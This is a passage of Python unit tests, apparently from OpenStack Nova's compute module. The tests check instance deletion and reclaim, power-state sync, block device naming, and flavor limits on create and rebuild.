self.compute._destroy_evacuated_instances(fake_context)
def test_destroy_evacuated_instance_not_implemented(self):
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
# those are already been evacuated to other host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_local')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'check_instance_shared_storage')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_cleanup')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute.driver.check_instance_shared_storage_local(fake_context,
evacuated_instance).AndRaise(NotImplementedError())
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
True)
self.mox.ReplayAll()
self.compute._destroy_evacuated_instances(fake_context)
def test_complete_partial_deletion(self):
admin_context = context.get_admin_context()
instance = {
'id': '1',
'vm_state': vm_states.DELETED,
'task_state': None,
'system_metadata': [{'key': 'fake_key', 'value': 'fake_value'}],
'vcpus': 1,
'memory_mb': 1,
'project_id': 'fake-prj',
'user_id': 'fake-user',
'deleted': 0
}
def fake_conductor(context, instance):
instance['deleted'] = instance['id']
self.stubs.Set(self.compute.conductor_api,
'instance_destroy',
fake_conductor)
self.stubs.Set(self.compute,
'_get_instance_volume_bdms',
lambda *a, **k: None)
self.stubs.Set(self.compute,
'_complete_deletion',
lambda *a, **k: None)
self.stubs.Set(quotas_obj.Quotas, 'reserve', lambda *a, **k: None)
self.compute._complete_partial_deletion(admin_context, instance)
self.assertFalse(instance['deleted'] == 0)
def test_init_instance_for_partial_deletion(self):
admin_context = context.get_admin_context()
instance = {'id': '1',
'vm_state': vm_states.DELETED,
'deleted': 0
}
def fake_partial_deletion(context, instance):
instance['deleted'] = instance['id']
self.stubs.Set(self.compute,
'_complete_partial_deletion',
fake_partial_deletion)
self.compute._init_instance(admin_context, instance)
self.assertFalse(instance['deleted'] == 0)
def test_partial_deletion_raise_exception(self):
admin_context = context.get_admin_context()
instance = {'id': '1',
'vm_state': vm_states.DELETED,
'deleted': 0
}
self.mox.StubOutWithMock(self.compute, '_complete_partial_deletion')
self.compute._complete_partial_deletion(
admin_context, instance).AndRaise(ValueError)
self.mox.ReplayAll()
self.compute._init_instance(admin_context, instance)
def test_add_remove_fixed_ip_updates_instance_updated_at(self):
def _noop(*args, **kwargs):
pass
self.stubs.Set(self.compute.network_api,
'add_fixed_ip_to_instance', _noop)
self.stubs.Set(self.compute.network_api,
'remove_fixed_ip_from_instance', _noop)
instance = self._create_fake_instance()
updated_at_1 = instance['updated_at']
self.compute.add_fixed_ip_to_instance(self.context, 'fake', instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
updated_at_2 = instance['updated_at']
self.compute.remove_fixed_ip_from_instance(self.context, 'fake',
instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
updated_at_3 = instance['updated_at']
updated_ats = (updated_at_1, updated_at_2, updated_at_3)
self.assertEqual(len(updated_ats), len(set(updated_ats)))
def test_no_pending_deletes_for_soft_deleted_instances(self):
self.flags(reclaim_instance_interval=0)
ctxt = context.get_admin_context()
instance = self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': timeutils.utcnow()})
self.compute._run_pending_deletes(ctxt)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertFalse(instance['cleaned'])
def test_reclaim_queued_deletes(self):
self.flags(reclaim_instance_interval=3600)
ctxt = context.get_admin_context()
# Active
self._create_fake_instance(params={'host': CONF.host})
# Deleted not old enough
self._create_fake_instance(params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': timeutils.utcnow()})
# Deleted old enough (only this one should be reclaimed)
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance = self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
# Restoring
# NOTE(hanlind): This specifically tests for a race condition
# where restoring a previously soft deleted instance sets
# deleted_at back to None, causing reclaim to think it can be
# deleted, see LP #1186243.
self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'task_state': task_states.RESTORING})
self.mox.StubOutWithMock(self.compute, '_delete_instance')
self.compute._delete_instance(ctxt, mox.IsA(instance_obj.Instance), [])
self.mox.ReplayAll()
self.compute._reclaim_queued_deletes(ctxt)
def test_reclaim_queued_deletes_continue_on_error(self):
# Verify that reclaim continues on error.
self.flags(reclaim_instance_interval=3600)
ctxt = context.get_admin_context()
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance1 = self._create_fake_instance_obj(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
instance2 = self._create_fake_instance_obj(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
instances = []
instances.append(instance1)
instances.append(instance2)
self.mox.StubOutWithMock(instance_obj.InstanceList,
'get_by_filters')
self.mox.StubOutWithMock(self.compute, '_deleted_old_enough')
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.compute, '_delete_instance')
instance_obj.InstanceList.get_by_filters(
ctxt, mox.IgnoreArg(),
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS
).AndReturn(instances)
# The first instance delete fails.
self.compute._deleted_old_enough(instance1, 3600).AndReturn(True)
self.compute.conductor_api.block_device_mapping_get_all_by_instance(
ctxt, instance1).AndReturn(None)
self.compute._delete_instance(ctxt, instance1,
None).AndRaise(test.TestingException)
# The second instance delete that follows.
self.compute._deleted_old_enough(instance2, 3600).AndReturn(True)
self.compute.conductor_api.block_device_mapping_get_all_by_instance(
ctxt, instance2).AndReturn(None)
self.compute._delete_instance(ctxt, instance2,
None)
self.mox.ReplayAll()
self.compute._reclaim_queued_deletes(ctxt)
def test_sync_power_states(self):
ctxt = self.context.elevated()
self._create_fake_instance({'host': self.compute.host})
self._create_fake_instance({'host': self.compute.host})
self._create_fake_instance({'host': self.compute.host})
self.mox.StubOutWithMock(self.compute.driver, 'get_info')
self.mox.StubOutWithMock(self.compute, '_sync_instance_power_state')
# Check to make sure task continues on error.
self.compute.driver.get_info(mox.IgnoreArg()).AndRaise(
exception.InstanceNotFound(instance_id='fake-uuid'))
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.NOSTATE).AndRaise(
exception.InstanceNotFound(instance_id='fake-uuid'))
self.compute.driver.get_info(mox.IgnoreArg()).AndReturn(
{'state': power_state.RUNNING})
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.RUNNING)
self.compute.driver.get_info(mox.IgnoreArg()).AndReturn(
{'state': power_state.SHUTDOWN})
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.SHUTDOWN)
self.mox.ReplayAll()
self.compute._sync_power_states(ctxt)
def _test_lifecycle_event(self, lifecycle_event, power_state):
instance = self._create_fake_instance()
uuid = instance['uuid']
self.mox.StubOutWithMock(self.compute, '_sync_instance_power_state')
if power_state != None:
self.compute._sync_instance_power_state(
mox.IgnoreArg(),
mox.ContainsKeyValue('uuid', uuid),
power_state)
self.mox.ReplayAll()
self.compute.handle_events(event.LifecycleEvent(uuid, lifecycle_event))
self.mox.VerifyAll()
self.mox.UnsetStubs()
def test_lifecycle_events(self):
self._test_lifecycle_event(event.EVENT_LIFECYCLE_STOPPED,
power_state.SHUTDOWN)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_STARTED,
power_state.RUNNING)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_PAUSED,
power_state.PAUSED)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_RESUMED,
power_state.RUNNING)
self._test_lifecycle_event(-1, None)
def test_lifecycle_event_non_existent_instance(self):
# No error raised for non-existent instance because of inherent race
# between database updates and hypervisor events. See bug #1180501.
event_instance = event.LifecycleEvent('does-not-exist',
event.EVENT_LIFECYCLE_STOPPED)
self.compute.handle_events(event_instance)
def test_allow_confirm_resize_on_instance_in_deleting_task_state(self):
instance = self._create_fake_instance_obj()
old_type = flavors.extract_flavor(instance)
new_type = flavors.get_flavor_by_flavor_id('4')
sys_meta = instance.system_metadata
sys_meta = flavors.save_flavor_info(sys_meta,
old_type, 'old_')
sys_meta = flavors.save_flavor_info(sys_meta,
new_type, 'new_')
sys_meta = flavors.save_flavor_info(sys_meta,
new_type)
fake_rt = self.mox.CreateMockAnything()
def fake_drop_resize_claim(*args, **kwargs):
pass
def fake_get_resource_tracker(self):
return fake_rt
def fake_setup_networks_on_host(self, *args, **kwargs):
pass
self.stubs.Set(fake_rt, 'drop_resize_claim', fake_drop_resize_claim)
self.stubs.Set(self.compute, '_get_resource_tracker',
fake_get_resource_tracker)
self.stubs.Set(self.compute.network_api, 'setup_networks_on_host',
fake_setup_networks_on_host)
migration = migration_obj.Migration()
migration.instance_uuid = instance.uuid
migration.status = 'finished'
migration.create(self.context.elevated())
instance.task_state = task_states.DELETING
instance.vm_state = vm_states.RESIZED
instance.system_metadata = sys_meta
instance.save()
self.compute.confirm_resize(self.context, instance=instance,
migration=migration)
instance.refresh()
self.assertEqual(vm_states.ACTIVE, instance['vm_state'])
def _get_instance_and_bdm_for_dev_defaults_tests(self):
instance = self._create_fake_instance(
params={'root_device_name': '/dev/vda'})
block_device_mapping = [
{'id': 3, 'instance_uuid': 'fake-instance',
'device_name': '/dev/vda',
'source_type': 'volume',
'destination_type': 'volume',
'image_id': 'fake-image-id-1',
'boot_index': 0}]
return instance, block_device_mapping
def test_default_block_device_names_empty_instance_root_dev(self):
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
instance['root_device_name'] = None
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute._instance_update(self.context, instance['uuid'],
root_device_name='/dev/vda')
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
def test_default_block_device_names_empty_root_device(self):
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
bdms[0]['device_name'] = None
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute.conductor_api.block_device_mapping_update(
self.context, bdms[0]['id'], {'device_name': '/dev/vda'})
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
def test_default_block_device_names_no_root_device(self):
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
instance['root_device_name'] = None
bdms[0]['device_name'] = None
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.compute,
'_default_root_device_name')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute._default_root_device_name(instance, mox.IgnoreArg(),
bdms[0]).AndReturn('/dev/vda')
self.compute._instance_update(self.context, instance['uuid'],
root_device_name='/dev/vda')
self.compute.conductor_api.block_device_mapping_update(
self.context, bdms[0]['id'], {'device_name': '/dev/vda'})
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
class ComputeAPITestCase(BaseTestCase):
def setUp(self):
def fake_get_nw_info(cls, ctxt, instance):
self.assertTrue(ctxt.is_admin)
return fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
super(ComputeAPITestCase, self).setUp()
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
self.security_group_api = (
openstack_driver.get_openstack_security_group_driver())
self.compute_api = compute.API(
security_group_api=self.security_group_api)
self.fake_image = {
'id': 1,
'name': 'fake_name',
'status': 'active',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id'},
}
def fake_show(obj, context, image_id):
if image_id:
return self.fake_image
else:
raise exception.ImageNotFound(image_id=image_id)
self.fake_show = fake_show
def _run_instance(self, params=None):
instance = jsonutils.to_primitive(self._create_fake_instance(params,
services=True))
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
return instance, instance_uuid
def test_create_with_too_little_ram(self):
# Test an instance type with too little memory.
inst_type = flavors.get_default_flavor()
inst_type['memory_mb'] = 1
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Now increase the inst_type memory and make sure all is fine.
inst_type['memory_mb'] = 2
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_too_little_disk(self):
# Test an instance type with too little disk space.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
self.fake_image['min_disk'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Now increase the inst_type disk space and make sure all is fine.
inst_type['root_gb'] = 2
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_too_large_image(self):
# Test an instance type with too little disk space.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
self.fake_image['size'] = '1073741825'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Reduce image to 1 GB limit and ensure it works
self.fake_image['size'] = '1073741824'
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_just_enough_ram_and_disk(self):
# Test an instance type with just enough ram and disk space.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 2
inst_type['memory_mb'] = 2
self.fake_image['min_ram'] = 2
self.fake_image['min_disk'] = 2
self.fake_image['name'] = 'fake_name'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_no_ram_and_disk_reqs(self):
# Test an instance type with no min_ram or min_disk.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
inst_type['memory_mb'] = 1
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_deleted_image(self):
# If we're given a deleted image by glance, we should not be able to
# build from it
inst_type = flavors.get_default_flavor()
self.fake_image['name'] = 'fake_name'
self.fake_image['status'] = 'DELETED'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
expected_message = (
exception.ImageNotActive.msg_fmt % {'image_id':
self.fake_image['id']})
with testtools.ExpectedException(exception.ImageNotActive,
expected_message):
self.compute_api.create(self.context, inst_type,
self.fake_image['id'])
def test_create_instance_defaults_display_name(self):
# Verify that an instance cannot be created without a display_name.
cases = [dict(), dict(display_name=None)]
for instance in cases:
(ref, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(),
'fake-image-uuid', **instance)
try:
self.assertNotEqual(ref[0]['display_name'], None)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_sets_system_metadata(self):
# Make sure image properties are copied into system metadata.
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='fake-image-uuid')
try:
sys_metadata = db.instance_system_metadata_get(self.context,
ref[0]['uuid'])
image_props = {'image_kernel_id': 'fake_kernel_id',
'image_ramdisk_id': 'fake_ramdisk_id',
'image_something_else': 'meow', }
for key, value in image_props.iteritems():
self.assertTrue(key in sys_metadata)
self.assertEqual(value, sys_metadata[key])
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_saves_type_in_system_metadata(self):
instance_type = flavors.get_default_flavor()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=instance_type,
image_href='some-fake-image')
try:
sys_metadata = db.instance_system_metadata_get(self.context,
ref[0]['uuid'])
instance_type_props = ['name', 'memory_mb', 'vcpus', 'root_gb',
'ephemeral_gb', 'flavorid', 'swap',
'rxtx_factor', 'vcpu_weight']
for key in instance_type_props:
sys_meta_key = "instance_type_%s" % key
self.assertTrue(sys_meta_key in sys_metadata)
self.assertEqual(str(instance_type[key]),
str(sys_metadata[sys_meta_key]))
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_associates_security_groups(self):
# Make sure create associates security groups.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
self.assertEqual(len(db.security_group_get_by_instance(
self.context, ref[0]['uuid'])), 1)
group = db.security_group_get(self.context, group['id'])
self.assertTrue(len(group['instances']) == 1)
finally:
db.security_group_destroy(self.context, group['id'])
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_with_invalid_security_group_raises(self):
instance_type = flavors.get_default_flavor()
pre_build_len = len(db.instance_get_all(self.context))
self.assertRaises(exception.SecurityGroupNotFoundForProject,
self.compute_api.create,
self.context,
instance_type=instance_type,
image_href=None,
security_group=['this_is_a_fake_sec_group'])
self.assertEqual(pre_build_len,
len(db.instance_get_all(self.context)))
def test_create_with_large_user_data(self):
# Test an instance type with too much user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceUserDataTooLarge,
self.compute_api.create, self.context, inst_type,
self.fake_image['id'], user_data=('1' * 65536))
def test_create_with_malformed_user_data(self):
# Test an instance type with malformed user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceUserDataMalformed,
self.compute_api.create, self.context, inst_type,
self.fake_image['id'], user_data='banana')
def test_create_with_base64_user_data(self):
# Test an instance type with ok much user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
# NOTE(mikal): a string of length 48510 encodes to 65532 characters of
# base64
(refs, resv_id) = self.compute_api.create(
self.context, inst_type, self.fake_image['id'],
user_data=base64.encodestring('1' * 48510))
db.instance_destroy(self.context, refs[0]['uuid'])
def test_populate_instance_for_create(self):
base_options = {'image_ref': self.fake_image['id'],
'system_metadata': {'fake': 'value'}}
instance = instance_obj.Instance()
instance.update(base_options)
inst_type = flavors.get_flavor_by_name("m1.tiny")
instance = self.compute_api._populate_instance_for_create(
instance,
self.fake_image,
1,
security_groups=None,
instance_type=inst_type)
self.assertEquals(str(base_options['image_ref']),
instance['system_metadata']['image_base_image_ref'])
self.assertEquals(vm_states.BUILDING, instance['vm_state'])
self.assertEquals(task_states.SCHEDULING, instance['task_state'])
self.assertEquals(1, instance['launch_index'])
self.assertIsNotNone(instance.get('uuid'))
self.assertEqual([], instance.security_groups.objects)
def test_default_hostname_generator(self):
fake_uuids = [str(uuid.uuid4()) for x in xrange(4)]
orig_populate = self.compute_api._populate_instance_for_create
def _fake_populate(base_options, *args, **kwargs):
base_options['uuid'] = fake_uuids.pop(0)
return orig_populate(base_options, *args, **kwargs)
self.stubs.Set(self.compute_api,
'_populate_instance_for_create',
_fake_populate)
cases = [(None, 'server-%s' % fake_uuids[0]),
('Hello, Server!', 'hello-server'),
('<}\x1fh\x10e\x08l\x02l\x05o\x12!{>', 'hello'),
('hello_server', 'hello-server')]
for display_name, hostname in cases:
(ref, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(), image_href='some-fake-image',
display_name=display_name)
try:
self.assertEqual(ref[0]['hostname'], hostname)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_destroy_instance_disassociates_security_groups(self):
# Make sure destroying disassociates security groups.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
db.instance_destroy(self.context, ref[0]['uuid'])
group = db.security_group_get(self.context, group['id'])
self.assertTrue(len(group['instances']) == 0)
finally:
db.security_group_destroy(self.context, group['id'])
def test_destroy_security_group_disassociates_instances(self):
# Make sure destroying security groups disassociates instances.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
db.security_group_destroy(self.context, group['id'])
admin_deleted_context = context.get_admin_context(
read_deleted="only")
group = db.security_group_get(admin_deleted_context, group['id'])
self.assertTrue(len(group['instances']) == 0)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_restore(self):
# Ensure instance can be restored from a soft delete.
instance, instance_uuid = self._run_instance(params={
'host': CONF.host,
'cell_name': 'foo'})
instance = instance_obj.Instance.get_by_uuid(
self.context, instance_uuid,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
self.compute_api.soft_delete(self.context, instance)
instance.refresh()
self.assertEqual(instance.task_state, task_states.SOFT_DELETING)
# set the state that the instance gets when soft_delete finishes
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save()
# Ensure quotas are committed
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'commit')
nova.quota.QUOTAS.commit(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.compute_api.restore(self.context, instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.RESTORING)
db.instance_destroy(self.context, instance['uuid'])
def _test_rebuild(self, vm_state):
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
# Set some image metadata that should get wiped out and reset
# as well as some other metadata that should be preserved.
db.instance_system_metadata_update(self.context, instance_uuid,
{'image_kernel_id': 'old-data',
'image_ramdisk_id': 'old_data',
'image_something_else': 'old-data',
'image_should_remove': 'bye-bye',
'preserved': 'preserve this!'},
True)
# Make sure Compute API updates the image_ref before casting to
# compute manager.
orig_update = self.compute_api.update
info = {'image_ref': None}
def update_wrapper(*args, **kwargs):
if 'image_ref' in kwargs:
info['image_ref'] = kwargs['image_ref']
return orig_update(*args, **kwargs)
self.stubs.Set(self.compute_api, 'update', update_wrapper)
image_ref = instance["image_ref"] + '-new_image_ref'
password = "new_password"
db.instance_update(self.context, instance['uuid'],
{"vm_state": vm_state})
self.compute_api.rebuild(self.context, instance, image_ref, password)
self.assertEqual(info['image_ref'], image_ref)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
sys_metadata = db.instance_system_metadata_get(self.context,
instance_uuid)
self.assertEqual(sys_metadata,
{'image_kernel_id': 'fake_kernel_id',
'image_min_disk': '1',
'image_ramdisk_id': 'fake_ramdisk_id',
'image_something_else': 'meow',
'preserved': 'preserve this!'})
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild(self):
self._test_rebuild(vm_state=vm_states.ACTIVE)
def test_rebuild_in_error_state(self):
self._test_rebuild(vm_state=vm_states.ERROR)
def test_rebuild_in_error_not_launched(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': ''}))
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"vm_state": vm_states.ERROR,
"launched_at": None})
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.rebuild,
self.context,
instance,
instance['image_ref'],
"new password")
def test_rebuild_no_image(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': ''}))
instance_uuid = instance['uuid']
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute.run_instance(self.context, instance=instance)
self.compute_api.rebuild(self.context, instance, '', 'new_password')
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
def test_rebuild_with_deleted_image(self):
# If we're given a deleted image by glance, we should not be able to
# rebuild from it
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
self.fake_image['name'] = 'fake_name'
self.fake_image['status'] = 'DELETED'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
expected_message = (
exception.ImageNotActive.msg_fmt % {'image_id':
self.fake_image['id']})
with testtools.ExpectedException(exception.ImageNotActive,
expected_message):
self.compute_api.rebuild(self.context, instance,
self.fake_image['id'], 'new_password')
def test_rebuild_with_too_little_ram(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_ram'] = 128
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image memory requirements and make sure it works
self.fake_image['min_ram'] = 64
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_too_little_disk(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_disk'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image disk requirements and make sure it works
self.fake_image['min_disk'] = 1
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_just_enough_ram_and_disk(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['min_ram'] = 64
self.fake_image['min_disk'] = 1
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_no_ram_and_disk_reqs(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_rebuild_with_too_large_image(self):
instance = jsonutils.to_primitive(
self._create_fake_instance(params={'image_ref': '1'}))
def fake_extract_flavor(_inst):
return dict(memory_mb=64, root_gb=1)
self.stubs.Set(flavors, 'extract_flavor',
fake_extract_flavor)
self.fake_image['size'] = '1073741825'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.rebuild, self.context,
instance, self.fake_image['id'], 'new_password')
# Reduce image to 1 GB limit and ensure it works
self.fake_image['size'] = '1073741824'
self.compute_api.rebuild(self.context,
instance, self.fake_image['id'], 'new_password')
db.instance_destroy(self.context, instance['uuid'])
def test_hostname_create(self):
# Ensure instance hostname is set during creation.
inst_type = flavors.get_flavor_by_name('m1.tiny')
(instances, _) = self.compute_api.create(self.context,
inst_type,
image_href='some-fake-image',
display_name='test host')
self.assertEqual('test-host', instances[0]['hostname'])
def test_set_admin_password(self):
# Ensure instance can have its admin password set.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(inst_ref['vm_state'], vm_states.ACTIVE)
